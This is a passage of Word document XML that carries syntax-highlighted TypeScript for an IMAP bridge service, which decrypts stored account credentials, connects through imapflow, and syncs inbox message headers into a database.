          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imapflow'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostalMime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'postal-mime'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { Email } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../models/Email.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { redis } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../config/redis.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { AuthService } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./auth.js'</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AccountDoc } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../types/index.js'</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ImapBridgeService {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> clients</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ImapFlow</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getClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc)</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ImapFlow</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account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id</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clients</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(key)) {</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clients</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</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(existing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">usable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> existing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> existing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logout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creds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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">decryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsEncrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsIv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsTag</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ImapFlow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapHost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapPort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">993</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapSecure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auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> creds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password</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emitLogs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connect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clients</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client)</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syncInbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> folderPath</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'INBOX'</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number</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getClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lock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getMailboxLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(folderPath)</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lastUid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">syncState</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lastUid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fetchRange </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lastUid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lastUid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</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'1:*'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Headers-only fetch para el listado</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> synced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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(fetchRange</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        uid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flags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envelope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headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'message-id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'in-reply-to'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'references'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        internalDate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struct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threadId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 {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lastUid) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">continue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasAttachments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">((part</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          part</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">disposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">includes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'attachment'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )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ntrolFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">updateOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          { accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
